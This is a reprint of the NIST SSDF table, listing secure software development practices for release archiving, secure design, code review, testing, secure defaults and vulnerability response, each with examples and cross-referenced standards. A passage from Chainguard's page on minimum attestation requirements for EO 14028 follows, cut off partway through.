PS.3.1: Securely archive the necessary files and supporting data (e.g., integrity verification information, provenance data) to be retained for each software release. Example 1: Store the release files, associated images, etc. in repositories following the organization’s established policy. Allow read-only access to them by necessary personnel and no access by anyone else.Example 2: Store and protect release integrity verification information and provenance data, such as by keeping it in a separate location from the release files or by signing the data. BSAFSS: PD.1-5, DE.1-2, IA.2CNCFSSCP: Securing Artefacts—Automation, Controlled Environments, Encryption; Securing Deployments—VerificationEO14028: 4e(iii), 4e(vi), 4e(ix), 4e(x)IDASOAR: 25IEC62443: SM-6, SM-7NISTCSF: PR.IP-4OWASPSCVS: 1, 3.18, 3.19, 6.3PCISSLC: 5.2, 6.1, 6.2SCSIC: Vendor Software Delivery Integrity ControlsSP80053: SA-10, SA-15, SA-15(11), SR-4SP800161: SA-8, SA-10, SA-15(11), SR-4 PS.3.2: Collect, safeguard, maintain, and share provenance data for all components of each software release (e.g., in a software bill of materials [SBOM]). Example 1: Make the provenance data available to software acquirers in accordance with the organization’s policies, preferably using standards-based formats.Example 2: Make the provenance data available to the organization’s operations and response teams to aid them in mitigating software vulnerabilities.Example 3: Protect the integrity of provenance data, and provide a way for recipients to verify provenance data integrity.Example 4: Update the provenance data every time any of the software’s components are updated. BSAFSS: SM.2BSIMM: SE3.6CNCFSSCP: Securing Materials—Verification, AutomationEO14028: 4e(vi), 4e(vii), 4e(ix), 4e(x)NTIASBOM: AllOWASPSCVS: 1.4, 2SCSIC: Vendor Software Delivery Integrity ControlsSCTPC: MAINTAIN3SP80053: SA-8, SR-3, SR-4SP800161: SA-8, SR-3, SR-4 Design Software to Meet Security Requirements and Mitigate Security Risks (PW.1): Identify and evaluate the security requirements for the software; determine what security risks the software is likely to face during operation and how the software’s design and architecture should mitigate those risks; and justify any cases where risk-based analysis indicates that security requirements should be relaxed or waived. Addressing security requirements and risks during software design (secure by design) is key for improving software security and also helps improve development efficiency. PW.1.1: Use forms of risk modeling – such as threat modeling, attack modeling, or attack surface mapping – to help assess the security risk for the software. Example 1: Train the development team (security champions, in particular) or collaborate with a risk modeling expert to create models and analyze how to use a risk-based approach to communicate the risks and determine how to address them, including implementing mitigations.Example 2: Perform more rigorous assessments for high-risk areas, such as protecting sensitive data and safeguarding identification, authentication, and access control, including credential management.Example 3: Review vulnerability reports and statistics for previous software to inform the security risk assessment.Example 4: Use data classification methods to identify and characterize each type of data that the software will interact with. 
BSAFSS: SC.1BSIMM: AM1.2, AM1.3, AM1.5, AM2.1, AM2.2, AM2.5, AM2.6, AM2.7, SFD2.2, AA1.1, AA1.2, AA1.3, AA2.1EO14028: 4e(ix)IDASOAR: 1IEC62443: SM-4, SR-1, SR-2, SD-1IR8397: 2.1ISO27034: 7.3.3MSSDL: 4NISTCSF: ID.RAOWASPASVS: 1.1.2, 1.2, 1.4, 1.6, 1.8, 1.9, 1.11, 2, 3, 4, 6, 8, 9, 11, 12, 13OWASPMASVS: 1.6, 1.8, 2, 3, 4, 5, 6OWASPSAMM: TA1-A, TA1-B, TA3-B, DR1-APCISSLC: 3.2, 3.3SCAGILE: Tasks Requiring the Help of Security Experts 3SCFPSSD: Threat ModelingSCTTM: Entire guideSP80053: SA-8, SA-11(2), SA-11(6), SA-15(5)SP800160: 3.3.4, 3.4.5SP800161: SA-8, SA-11(2), SA-11(6), SA-15(5)SP800181: T0038, T0062; K0005, K0009, K0038, K0039, K0070, K0080, K0119, K0147, K0149, K0151, K0152, K0160, K0161, K0162, K0165, K0297, K0310, K0344, K0362, K0487, K0624; S0006, S0009, S0022, S0078, S0171, S0229, S0248; A0092, A0093, A0107 PW.1.2: Track and maintain the software’s security requirements, risks, and design decisions. Example 1: Record the response to each risk, including how mitigations are to be achieved and what the rationales are for any approved exceptions to the security requirements. Add any mitigations to the software’s security requirements.Example 2: Maintain records of design decisions, risk responses, and approved exceptions that can be used for auditing and maintenance purposes throughout the rest of the software life cycle.Example 3: Periodically re-evaluate all approved exceptions to the security requirements, and implement changes as needed. BSAFSS: SC.1-1, PD.1-1BSIMM: SFD3.1, SFD3.3, AA2.2, AA3.2EO14028: 4e(v), 4e(ix)IEC62443: SD-1ISO27034: 7.3.3MSSDL: 4NISTLABEL: 2.2.2.2OWASPASVS: 1.1.3, 1.1.4OWASPMASVS: 1.3, 1.6OWASPSAMM: DR1-BPCISSLC: 3.2, 3.3SP80053: SA-8, SA-10, SA-17SP800161: SA-8, SA-17SP800181: T0256; K0005, K0038, K0039, K0147, K0149, K0160, K0161, K0162, K0165, K0344, K0362, K0487; S0006, S0009, S0078, S0171, S0229, S0248; A0092, A0107 PW.1.3: Where appropriate, build in support for using standardized security features and services (e.g., enabling software to integrate with existing log management, identity management, access control, and vulnerability management systems) instead of creating proprietary implementations of security features and services. [Formerly PW.4.3] Example 1: Maintain one or more software repositories of modules for supporting standardized security features and services.Example 2: Determine secure configurations for modules for supporting standardized security features and services, and make these configurations available (e.g., as configuration-as-code) so developers can readily use them.Example 3: Define criteria for which security features and services must be supported by software to be developed. BSAFSS: SI.2-1, SI.2-2, LO.1BSIMM: SFD1.1, SFD2.1, SFD3.2, SR1.1, SR3.4EO14028: 4e(ix)IEC62443: SD-1, SD-4MSSDL: 5OWASPASVS: 1.1.6OWASPSAMM: SA2-ASCFPSSD: Standardize Identity and Access Management; Establish Log Requirements and Audit Practices Review the Software Design to Verify Compliance with Security Requirements and Risk Information (PW.2): Help ensure that the software will meet the security requirements and satisfactorily address the identified risk information. PW.2.1: Have 1) a qualified person (or people) who were not involved with the design and/or 2) automated processes instantiated in the toolchain review the software design to confirm and enforce that it meets all of the security requirements and satisfactorily addresses the identified risk information. 
Example 1: Review the software design to confirm that it addresses applicable security requirements.Example 2: Review the risk models created during software design to determine if they appear to adequately identify the risks.Example 3: Review the software design to confirm that it satisfactorily addresses the risks identified by the risk models.Example 4: Have the software’s designer correct failures to meet the requirements.Example 5: Change the design and/or the risk response strategy if the security requirements cannot be met.Example 6: Record the findings of design reviews to serve as artifacts (e.g., in the software specification, in the issue tracking system, in the threat model). BSAFSS: TV.3BSIMM: AA1.1, AA1.2, AA1.3, AA2.1, AA3.1EO14028: 4e(iv), 4e(v), 4e(ix)IEC62443: SM-2, SR-2, SR-5, SD-3, SD-4, SI-2ISO27034: 7.3.3OWASPASVS: 1.1.5OWASPSAMM: DR1-A, DR1-BPCISSLC: 3.2SP800181: T0328; K0038, K0039, K0070, K0080, K0119, K0152, K0153, K0161, K0165, K0172, K0297; S0006, S0009, S0022, S0036, S0141, S0171 Reuse Existing, Well-Secured Software When Feasible Instead of Duplicating Functionality (PW.4): Lower the costs of software development, expedite software development, and decrease the likelihood of introducing additional security vulnerabilities into the software by reusing software modules and services that have already had their security posture checked. This is particularly important for software that implements security functionality, such as cryptographic modules and protocols. PW.4.1: Acquire and maintain well-secured software components (e.g., software libraries, modules, middleware, frameworks) from commercial, open-source, and other third-party developers for use by the organization’s software. Example 1: Review and evaluate third-party software components in the context of their expected use. If a component is to be used in a substantially different way in the future, perform the review and evaluation again with that new context in mind.Example 2: Determine secure configurations for software components, and make these available (e.g., as configuration-as-code) so developers can readily use the configurations.Example 3: Obtain provenance information (e.g., SBOM, source composition analysis, binary software composition analysis) for each software component, and analyze that information to better assess the risk that the component may introduce.Example 4: Establish one or more software repositories to host sanctioned and vetted open-source components.Example 5: Maintain a list of organization-approved commercial software components and component versions along with their provenance data.Example 6: Designate which components must be included in software to be developed.Example 7: Implement processes to update deployed software components to newer versions, and retain older versions of software components until all transitions from those versions have been completed successfully.Example 8: If the integrity or provenance of acquired binaries cannot be confirmed, build binaries from source code after verifying the source code’s integrity and provenance. 
BSAFSS: SM.2BSIMM: SFD2.1, SFD3.2, SR2.4, SR3.1, SE3.6CNCFSSCP: Securing Materials—VerificationEO14028: 4e(iii), 4e(vi), 4e(ix), 4e(x)IDASOAR: 19IEC62443: SM-9, SM-10MSSDL: 6NISTCSF: ID.SC-2OWASPASVS: 1.1.6OWASPSAMM: SA1-AOWASPSCVS: 4SCSIC: Vendor Sourcing Integrity ControlsSCTPC: MAINTAINSP80053: SA-4, SA-5, SA-8(3), SA-10(6), SR-3, SR-4SP800161: SA-4, SA-5, SA-8(3), SA-10(6), SR-3, SR-4SP800181: K0039 PW.4.2: Create and maintain well-secured software components in-house following SDLC processes to meet common internal software development needs that cannot be better met by third-party software components. Example 1: Follow organization-established security practices for secure software development when creating and maintaining the components.Example 2: Determine secure configurations for software components, and make these available (e.g., as configuration-as-code) so developers can readily use the configurations.Example 3: Maintain one or more software repositories for these components.Example 4: Designate which components must be included in software to be developed.Example 5: Implement processes to update deployed software components to newer versions, and maintain older versions of software components until all transitions from those versions have been completed successfully. BSIMM: SFD1.1, SFD2.1, SFD3.2, SR1.1EO14028: 4e(ix)IDASOAR: 19OWASPASVS: 1.1.6SCTPC: MAINTAINSP80053: SA-8(3)SP800161: SA-8(3)SP800181: SP-DEV-001 PW.4.4: Verify that acquired commercial, open-source, and all other third-party software components comply with the requirements, as defined by the organization, throughout their life cycles. Example 1: Regularly check whether there are publicly known vulnerabilities in the software modules and services that vendors have not yet fixed.Example 2: Build into the toolchain automatic detection of known vulnerabilities in software components.Example 3: Use existing results from commercial services for vetting the software modules and services.Example 4: Ensure that each software component is still actively maintained and has not reached end of life; this should include new vulnerabilities found in the software being remediated.Example 5: Determine a plan of action for each software component that is no longer being maintained or will not be available in the near future.Example 6: Confirm the integrity of software components through digital signatures or other mechanisms.Example 7: Review, analyze, and/or test code. See PW.7 and PW.8. 
BSAFSS: SC.3-1, SM.2-1, SM.2-2, SM.2-3, TV.2, TV.3BSIMM: CP3.2, SR2.4, SR3.1, SR3.2, SE2.4, SE3.6CNCFSSCP: Securing Materials—Verification, AutomationEO14028: 4e(iii), 4e(iv), 4e(vi), 4e(ix), 4e(x)IDASOAR: 21IEC62443: SI-1, SM-9, SM-10, DM-1IR8397: 2.11MSSDL: 7NISTCSF: ID.SC-4, PR.DS-6NISTLABEL: 2.2.2.2OWASPASVS: 10, 14.2OWASPMASVS: 7.5OWASPSAMM: TA3-A, SR3-BOWASPSCVS: 4, 5, 6PCISSLC: 3.2, 3.4, 4.1SCAGILE: Tasks Requiring the Help of Security Experts 8SCFPSSD: Manage Security Risk Inherent in the Use of Third-Party ComponentsSCSIC: Vendor Sourcing Integrity Controls, Peer Reviews and Security TestingSCTPC: MAINTAIN, ASSESSSP80053: SA-9, SR-3, SR-4, SR-4(3), SR-4(4)SP800160: 3.1.2, 3.3.8SP800161: SA-4, SA-8, SA-9, SA-9(3), SR-3, SR-4, SR-4(3), SR-4(4)SP800181: SP-DEV-002; K0153, K0266; S0298 Create Source Code by Adhering to Secure Coding Practices (PW.5): Decrease the number of security vulnerabilities in the software, and reduce costs by minimizing vulnerabilities introduced during source code creation that meet or exceed organization-defined vulnerability severity criteria. PW.5.1: Follow all secure coding practices that are appropriate to the development languages and environment to meet the organization’s requirements. Example 1: Validate all inputs, and validate and properly encode all outputs.Example 2: Avoid using unsafe functions and calls.Example 3: Detect errors, and handle them gracefully.Example 4: Provide logging and tracing capabilities.Example 5: Use development environments with automated features that encourage or require the use of secure coding practices with just-in-time training-in-place.Example 6: Follow procedures for manually ensuring compliance with secure coding practices when automated methods are insufficient or unavailable.Example 7: Use tools (e.g., linters, formatters) to standardize the style and formatting of the source code.Example 8: Check for other vulnerabilities that are common to the development languages and environment.Example 9: Have the developer review their own human-readable code to complement (not replace) code review performed by other people or tools. See PW.7. BSAFSS: SC.2, SC.3, LO.1, EE.1BSIMM: SR3.3, CR1.4, CR3.5EO14028: 4e(iv), 4e(ix)IDASOAR: 2IEC62443: SI-1, SI-2ISO27034: 7.3.5MSSDL: 9OWASPASVS: 1.1.7, 1.5, 1.7, 5, 7OWASPMASVS: 7.6SCFPSSD: Establish Log Requirements and Audit Practices, Use Code Analysis Tools to Find Security Issues Early, Handle Data Safely, Handle Errors, Use Safe Functions OnlySP800181: SP-DEV-001; T0013, T0077, T0176; K0009, K0016, K0039, K0070, K0140, K0624; S0019, S0060, S0149, S0172, S0266; A0036, A0047 Configure the Compilation, Interpreter, and Build Processes to Improve Executable Security (PW.6): Decrease the number of security vulnerabilities in the software and reduce costs by eliminating vulnerabilities before testing occurs. PW.6.1: Use compiler, interpreter, and build tools that offer features to improve executable security. Example 1: Use up-to-date versions of compiler, interpreter, and build tools.Example 2: Follow change management processes when deploying or updating compiler, interpreter, and build tools, and audit all unexpected changes to tools.Example 3: Regularly validate the authenticity and integrity of compiler, interpreter, and build tools. See PO.3. 
BSAFSS: DE.2-1BSIMM: SE2.4CNCFSSCP: Securing Build Pipelines—Verification, AutomationEO14028: 4e(iv), 4e(ix)IEC62443: SI-2MSSDL: 8SCAGILE: Operational Security Task 3SCFPSSD: Use Current Compiler and Toolchain Versions and Secure Compiler OptionsSCSIC: Vendor Software Development Integrity ControlsSP80053: SA-15SP800161: SA-15 PW.6.2: Determine which compiler, interpreter, and build tool features should be used and how each should be configured, then implement and use the approved configurations. Example 1: Enable compiler features that produce warnings for poorly secured code during the compilation process.Example 2: Implement the “clean build” concept, where all compiler warnings are treated as errors and eliminated except those determined to be false positives or irrelevant.Example 3: Perform all builds in a dedicated, highly controlled build environment.Example 4: Enable compiler features that randomize or obfuscate execution characteristics, such as memory location usage, that would otherwise be predictable and thus potentially exploitable.Example 5: Test to ensure that the features are working as expected and are not inadvertently causing any operational issues or other problems.Example 6: Continuously verify that the approved configurations are being used.Example 7: Make the approved tool configurations available as configuration-as-code so developers can readily use them. BSAFSS: DE.2-3, DE.2-4, DE.2-5BSIMM: SE2.4, SE3.2CNCFSSCP: Securing Build Pipelines—Verification, AutomationEO14028: 4e(iv), 4e(ix)IEC62443: SI-2IR8397: 2.5MSSDL: 8OWASPASVS: 14.1, 14.2.1OWASPMASVS: 7.2PCISSLC: 3.2SCAGILE: Operational Security Task 8SCFPSSD: Use Current Compiler and Toolchain Versions and Secure Compiler OptionsSCSIC: Vendor Software Development Integrity ControlsSP80053: SA-15, SR-9SP800161: SA-15, SR-9SP800181: K0039, K0070 Review and/or Analyze Human-Readable Code to Identify Vulnerabilities and Verify Compliance with Security Requirements (PW.7): Help identify vulnerabilities so that they can be corrected before the software is released to prevent exploitation. Using automated methods lowers the effort and resources needed to detect vulnerabilities. Human-readable code includes source code, scripts, and any other form of code that an organization deems human-readable. PW.7.1: Determine whether code review (a person looks directly at the code to find issues) and/or code analysis (tools are used to find issues in code, either in a fully automated way or in conjunction with a person) should be used, as defined by the organization. Example 1: Follow the organization’s policies or guidelines for when code review should be performed and how it should be conducted. This may include third-party code and reusable code modules written in-house.Example 2: Follow the organization’s policies or guidelines for when code analysis should be performed and how it should be conducted.Example 3: Choose code review and/or analysis methods based on the stage of the software. BSIMM: CR1.5EO14028: 4e(iv), 4e(ix)IEC62443: SM-5, SI-1, SVV-1NISTLABEL: 2.2.2.2SCSIC: Peer Reviews and Security TestingSP80053: SA-11SP800161: SA-11SP800181: SP-DEV-002; K0013, K0039, K0070, K0153, K0165; S0174 PW.7.2: Perform the code review and/or code analysis based on the organization’s secure coding standards, and record and triage all discovered issues and recommended remediations in the development team’s workflow or issue tracking system. 
Example 1: Perform peer review of code, and review any existing code review, analysis, or testing results as part of the peer review.Example 2: Use expert reviewers to check code for backdoors and other malicious content.Example 3: Use peer reviewing tools that facilitate the peer review process, and document all discussions and other feedback.Example 4: Use a static analysis tool to automatically check code for vulnerabilities and compliance with the organization’s secure coding standards with a human reviewing the issues reported by the tool and remediating them as necessary.Example 5: Use review checklists to verify that the code complies with the requirements.Example 6: Use automated tools to identify and remediate documented and verified unsafe software practices on a continuous basis as human-readable code is checked into the code repository.Example 7: Identify and document the root causes of discovered issues.Example 8: Document lessons learned from code review and analysis in a wiki that developers can access and search. BSAFSS: TV.2, PD.1-4BSIMM: CR1.2, CR1.4, CR1.6, CR2.6, CR2.7, CR3.4, CR3.5EO14028: 4e(iv), 4e(v), 4e(ix)IDASOAR: 3, 4, 5, 14, 15, 48IEC62443: SI-1, SVV-1, SVV-2IR8397: 2.3, 2.4ISO27034: 7.3.6MSSDL: 9, 10NISTLABEL: 2.2.2.2OWASPASVS: 1.1.7, 10OWASPMASVS: 7.5OWASPSAMM: IR1-B, IR2-A, IR2-B, IR3-APCISSLC: 3.2, 4.1SCAGILE: Operational Security Tasks 4, 7; Tasks Requiring the Help of Security Experts 10SCFPSSD: Use Code Analysis Tools to Find Security Issues Early, Use Static Analysis Security Testing Tools, Perform Manual Verification of Security Features/MitigationsSCSIC: Peer Reviews and Security TestingSP80053: SA-11, SA-11(1), SA-11(4), SA-15(7)SP800161: SA-11, SA-11(1), SA-11(4), SA-15(7)SP800181: SP-DEV-001, SP-DEV-002; T0013, T0111, T0176, T0267, T0516; K0009, K0039, K0070, K0140, K0624; S0019, S0060, S0078, S0137, S0149, S0167, S0174, S0242, S0266; A0007, A0015, A0036, A0044, A0047 Test Executable Code to Identify Vulnerabilities and Verify Compliance with Security Requirements (PW.8): Help identify vulnerabilities so that they can be corrected before the software is released in order to prevent exploitation. Using automated methods lowers the effort and resources needed to detect vulnerabilities and improves traceability and repeatability. Executable code includes binaries, directly executed bytecode and source code, and any other form of code that an organization deems executable. PW.8.1: Determine whether executable code testing should be performed to find vulnerabilities not identified by previous reviews, analysis, or testing and, if so, which types of testing should be used. Example 1: Follow the organization’s policies or guidelines for when code testing should be performed and how it should be conducted (e.g., within a sandboxed environment). This may include third-party executable code and reusable executable code modules written in-house.Example 2: Choose testing methods based on the stage of the software. BSAFSS: TV.3BSIMM: PT2.3EO14028: 4e(ix)IEC62443: SVV-1, SVV-2, SVV-3, SVV-4, SVV-5NISTLABEL: 2.2.2.2SCSIC: Peer Reviews and Security TestingSP80053: SA-11SP800161: SA-11SP800181: SP-DEV-001, SP-DEV-002; T0456; K0013, K0039, K0070, K0153, K0165, K0342, K0367, K0536, K0624; S0001, S0015, S0026, S0061, S0083, S0112, S0135 PW.8.2: Scope the testing, design the tests, perform the testing, and document the results, including recording and triaging all discovered issues and recommended remediations in the development team’s workflow or issue tracking system. 
Example 1: Perform robust functional testing of security features.Example 2: Integrate dynamic vulnerability testing into the project’s automated test suite.Example 3: Incorporate tests for previously reported vulnerabilities into the project’s test suite to ensure that errors are not reintroduced.Example 4: Take into consideration the infrastructures and technology stacks that the software will be used with in production when developing test plans.Example 5: Use fuzz testing tools to find issues with input handling.Example 6: If resources are available, use penetration testing to simulate how an attacker might attempt to compromise the software in high-risk scenarios.Example 7: Identify and record the root causes of discovered issues.Example 8: Document lessons learned from code testing in a wiki that developers can access and search.Example 9: Use source code, design records, and other resources when developing test plans. BSAFSS: TV.3, TV.5, PD.1-4BSIMM: ST1.1, ST1.3, ST1.4, ST2.4, ST2.5, ST2.6, ST3.3, ST3.4, ST3.5, ST3.6, PT1.1, PT1.2, PT1.3, PT3.1EO14028: 4e(iv), 4e(v), 4e(ix)IDASOAR: 7, 8, 10, 11, 38, 39, 43, 44, 48, 55, 56, 57IEC62443: SM-5, SM-13, SI-1, SVV-1, SVV-2, SVV-3, SVV-4, SVV-5IR8397: 2.6, 2.7, 2.8, 2.9, 2.10, 2.11ISO27034: 7.3.6MSSDL: 10, 11NISTLABEL: 2.2.2.2OWASPMASVS: 7.5OWASPSAMM: ST1-A, ST1-B, ST2-A, ST2-B, ST3-APCISSLC: 4.1SCAGILE: Operational Security Tasks 10, 11; Tasks Requiring the Help of Security Experts 4, 5, 6, 7SCFPSSD: Perform Dynamic Analysis Security Testing, Fuzz Parsers, Network Vulnerability Scanning, Perform Automated Functional Testing of Security Features/Mitigations, Perform Penetration TestingSCSIC: Peer Reviews and Security TestingSP80053: SA-11, SA-11(5), SA-11(8), SA-15(7)SP800161: SA-11, SA-11(5), SA-11(8), SA-15(7)SP800181: SP-DEV-001, SP-DEV-002; T0013, T0028, T0169, T0176, T0253, T0266, T0456, T0516; K0009, K0039, K0070, K0272, K0339, K0342, K0362, K0536, K0624; S0001, S0015, S0046, S0051, S0078, S0081, S0083, S0135, S0137, S0167, S0242; A0015 Configure Software to Have Secure Settings by Default (PW.9): Help improve the security of the software at the time of installation to reduce the likelihood of the software being deployed with weak security settings, putting it at greater risk of compromise. PW.9.1: Define a secure baseline by determining how to configure each setting that has an effect on security or a security-related setting so that the default settings are secure and do not weaken the security functions provided by the platform, network infrastructure, or services. Example 1: Conduct testing to ensure that the settings, including the default settings, are working as expected and are not inadvertently causing any security weaknesses, operational issues, or other problems. BSAFSS: CF.1BSIMM: SE2.2EO14028: 4e(iv), 4e(ix)IDASOAR: 23IEC62443: SD-4, SVV-1, SG-1ISO27034: 7.3.5SCAGILE: Tasks Requiring the Help of Security Experts 12SCSIC: Vendor Software Delivery Integrity Controls, Vendor Software Development Integrity ControlsSP800181: SP-DEV-002; K0009, K0039, K0073, K0153, K0165, K0275, K0531; S0167 PW.9.2: Implement the default settings (or groups of default settings, if applicable), and document each setting for software administrators. 
Example 1: Verify that the approved configuration is in place for the software.Example 2: Document each setting’s purpose, options, default value, security relevance, potential operational impact, and relationships with other settings.Example 3: Use authoritative programmatic technical mechanisms to record how each setting can be implemented and assessed by software administrators.Example 4: Store the default configuration in a usable format and follow change control practices for modifying it (e.g., configuration-as-code). BSAFSS: CF.1BSIMM: SE2.2EO14028: 4e(iv), 4e(ix)IDASOAR: 23IEC62443: SG-3OWASPSAMM: OE1-APCISSLC: 8.1, 8.2SCAGILE: Tasks Requiring the Help of Security Experts 12SCFPSSD: Verify Secure Configurations and Use of Platform MitigationSCSIC: Vendor Software Delivery Integrity Controls, Vendor Software Development Integrity ControlsSP80053: SA-5, SA-8(23)SP800161: SA-5, SA-8(23)SP800181: SP-DEV-001; K0009, K0039, K0073, K0153, K0165, K0275, K0531 Identify and Confirm Vulnerabilities on an Ongoing Basis (RV.1): Help ensure that vulnerabilities are identified more quickly so that they can be remediated more quickly in accordance with risk, reducing the window of opportunity for attackers. RV.1.1: Gather information from software acquirers, users, and public sources on potential vulnerabilities in the software and third-party components that the software uses, and investigate all credible reports. Example 1: Monitor vulnerability databases , security mailing lists, and other sources of vulnerability reports through manual or automated means.Example 2: Use threat intelligence sources to better understand how vulnerabilities in general are being exploited.Example 3: Automatically review provenance and software composition data for all software components to identify any new vulnerabilities they have. BSAFSS: VM.1-3, VM.3BSIMM: AM1.5, CMVM1.2, CMVM2.1, CMVM3.4, CMVM3.7CNCFSSCP: Securing Materials—VerificationEO14028: 4e(iv), 4e(vi), 4e(viii), 4e(ix)IEC62443: DM-1, DM-2, DM-3ISO29147: 6.2.1, 6.2.2, 6.2.4, 6.3, 6.5ISO30111: 7.1.3OWASPSAMM: IM1-A, IM2-B, EH1-BOWASPSCVS: 4PCISSLC: 3.4, 4.1, 9.1SCAGILE: Operational Security Task 5SCFPSSD: Vulnerability Response and DisclosureSCTPC: MONITOR1SP80053: SA-10, SR-3, SR-4SP800161: SA-10, SR-3, SR-4SP800181: K0009, K0038, K0040, K0070, K0161, K0362; S0078 RV.1.2: Review, analyze, and/or test the software’s code to identify or confirm the presence of previously undetected vulnerabilities. Example 1: Configure the toolchain to perform automated code analysis and testing on a regular or continuous basis for all supported releases.Example 2: See PW.7 and PW.8. BSAFSS: VM.1-2, VM.2-1BSIMM: CMVM3.1EO14028: 4e(iv), 4e(vi), 4e(viii), 4e(ix)IEC62443: SI-1, SVV-2, SVV-3, SVV-4, DM-1, DM-2ISO27034: 7.3.6ISO29147: 6.4ISO30111: 7.1.4PCISSLC: 3.4, 4.1SCAGILE: Operational Security Tasks 10, 11SP80053: SA-11SP800161: SA-11SP800181: SP-DEV-002; K0009, K0039, K0153 RV.1.3: Have a policy that addresses vulnerability disclosure and remediation, and implement the roles, responsibilities, and processes needed to support that policy. 
Example 1: Establish a vulnerability disclosure program, and make it easy for security researchers to learn about your program and report possible vulnerabilities.Example 2: Have a Product Security Incident Response Team (PSIRT) and processes in place to handle the responses to vulnerability reports and incidents, including communications plans for all stakeholders.Example 3: Have a security response playbook to handle a generic reported vulnerability, a report of zero-days, a vulnerability being exploited in the wild, and a major ongoing incident involving multiple parties and open-source software components.Example 4: Periodically conduct exercises of the product security incident response processes. BSAFSS: VM.1-1, VM.2BSIMM: CMVM1.1, CMVM2.1, CMVM3.3, CMVM3.7EO14028: 4e(viii), 4e(ix)IEC62443: DM-1, DM-2, DM-3, DM-4, DM-5ISO29147: AllISO30111: AllMSSDL: 12NISTLABEL: 2.2.2.3OWASPMASVS: 1.11OWASPSAMM: IM1-A, IM1-B, IM2-A, IM2-BPCISSLC: 9.2, 9.3SCFPSSD: Vulnerability Response and DisclosureSP80053: SA-15(10)SP800160: 3.3.8SP800161: SA-15(10)SP800181: K0041, K0042, K0151, K0292, K0317; S0054; A0025SP800216: All Assess, Prioritize, and Remediate Vulnerabilities (RV.2): Help ensure that vulnerabilities are remediated in accordance with risk to reduce the window of opportunity for attackers. RV.2.1: Analyze each vulnerability to gather sufficient information about risk to plan its remediation or other risk response. Example 1: Use existing issue tracking software to record each vulnerability.Example 2: Perform risk calculations for each vulnerability based on estimates of its exploitability, the potential impact if exploited, and any other relevant characteristics. BSAFSS: VM.2BSIMM: CMVM1.2, CMVM2.2EO14028: 4e(iv), 4e(viii), 4e(ix)IEC62443: DM-2, DM-3ISO30111: 7.1.4NISTLABEL: 2.2.2.2PCISSLC: 3.4, 4.2SCAGILE: Operational Security Task 1, Tasks Requiring the Help of Security Experts 10SP80053: SA-10, SA-15(7)SP800160: 3.3.8SP800161: SA-15(7)SP800181: K0009, K0039, K0070, K0161, K0165; S0078 RV.2.2: Plan and implement risk responses for vulnerabilities. Example 1: Make a risk-based decision as to whether each vulnerability will be remediated or if the risk will be addressed through other means (e.g., risk acceptance, risk transference), and prioritize any actions to be taken.Example 2: If a permanent mitigation for a vulnerability is not yet available, determine how the vulnerability can be temporarily mitigated until the permanent solution is available, and add that temporary remediation to the plan.Example 3: Develop and release security advisories that provide the necessary information to software acquirers, including descriptions of what the vulnerabilities are, how to find instances of the vulnerable software, and how to address them (e.g., where to get patches and what the patches change in the software; what configuration settings may need to be changed; how temporary workarounds could be implemented).Example 4: Deliver remediations to acquirers via an automated and trusted delivery mechanism. A single remediation could address multiple vulnerabilities.Example 5: Update records of design decisions, risk responses, and approved exceptions as needed. See PW.1.2. 
BSAFSS: VM.1-1, VM-2; BSIMM: CMVM2.1; EO14028: 4e(iv), 4e(vi), 4e(viii), 4e(ix); IEC62443: DM-4; ISO30111: 7.1.4, 7.1.5; NISTLABEL: 2.2.2.2; PCISSLC: 4.1, 4.2, 10.1; SCAGILE: Operational Security Task 2; SCFPSSD: Fix the Vulnerability, Identify Mitigating Factors or Workarounds; SCTPC: MITIGATE; SP80053: SA-5, SA-10, SA-11, SA-15(7); SP800160: 3.3.8; SP800161: SA-5, SA-8, SA-10, SA-11, SA-15(7); SP800181: T0163, T0229, T0264; K0009, K0070

Analyze Vulnerabilities to Identify Their Root Causes (RV.3): Help reduce the frequency of vulnerabilities in the future.

RV.3.1: Analyze identified vulnerabilities to determine their root causes. Example 1: Record the root cause of discovered issues. Example 2: Record lessons learned through root cause analysis in a wiki that developers can access and search. BSAFSS: VM.2-1; BSIMM: CMVM3.1, CMVM3.2; EO14028: 4e(ix); IEC62443: DM-3; ISO30111: 7.1.4; OWASPSAMM: IM3-A; PCISSLC: 4.2; SCFPSSD: Secure Development Lifecycle Feedback; SP800181: T0047, K0009, K0039, K0070, K0343

RV.3.2: Analyze the root causes over time to identify patterns, such as a particular secure coding practice not being followed consistently. Example 1: Record lessons learned through root cause analysis in a wiki that developers can access and search. Example 2: Add mechanisms to the toolchain to automatically detect future instances of the root cause. Example 3: Update manual processes to detect future instances of the root cause. BSAFSS: VM.2-1, PD.1-3; BSIMM: CP3.3, CMVM3.2; EO14028: 4e(ix); IEC62443: DM-4; ISO30111: 7.1.7; OWASPSAMM: IM3-B; PCISSLC: 2.6, 4.2; SCFPSSD: Secure Development Lifecycle Feedback; SP800160: 3.3.8; SP800181: T0111, K0009, K0039, K0070, K0343

RV.3.3: Review the software for similar vulnerabilities to eradicate a class of vulnerabilities, and proactively fix them rather than waiting for external reports. Example 1: See PW.7 and PW.8. BSAFSS: VM.2; BSIMM: CR3.3, CMVM3.1; EO14028: 4e(iv), 4e(viii), 4e(ix); IEC62443: SI-1, DM-3, DM-4; ISO30111: 7.1.4; PCISSLC: 4.2; SP80053: SA-11; SP800161: SA-11; SP800181: SP-DEV-001, SP-DEV-002; K0009, K0039, K0070

RV.3.4: Review the SDLC process, and update it if appropriate to prevent (or reduce the likelihood of) the root cause recurring in updates to the software or in new software that is created. Example 1: Record lessons learned through root cause analysis in a wiki that developers can access and search. Example 2: Plan and implement changes to the appropriate SDLC practices. BSAFSS: PD.1-3; BSIMM: CP3.3, CMVM3.2; EO14028: 4e(ix); IEC62443: DM-6; ISO30111: 7.1.7; MSSDL: 2; PCISSLC: 2.6, 4.2; SCFPSSD: Secure Development Lifecycle Feedback; SP80053: SA-15; SP800161: SA-15; SP800181: K0009, K0039, K0070

References

The SSDF Table was originally published at NIST SP 800-218: Secure Software Development Framework (SSDF) Version 1.1: Recommendations for Mitigating the Risk of Software Vulnerabilities. Reprinted courtesy of the National Institute of Standards and Technology, U.S. Department of Commerce. Not copyrightable in the United States.

---

### Minimum Attestation References

URL: https://edu.chainguard.dev/software-security/secure-software-development/minimum-attestation-references/
Last Modified: May 10, 2023
Tags: Reference

The minimum requirements within the Secure Software Attestation Form address requirements put forth in EO 14028 subsection (4)(e) and specific SSDF practices and tasks. For reference, please review the chart below; each attestation requirement is listed with its related EO 14028 subsection and related SSDF practices and tasks.

1) The software was developed and built in secure environments. Those environments were secured by the following actions, at a minimum (4e(i); see the actions below):

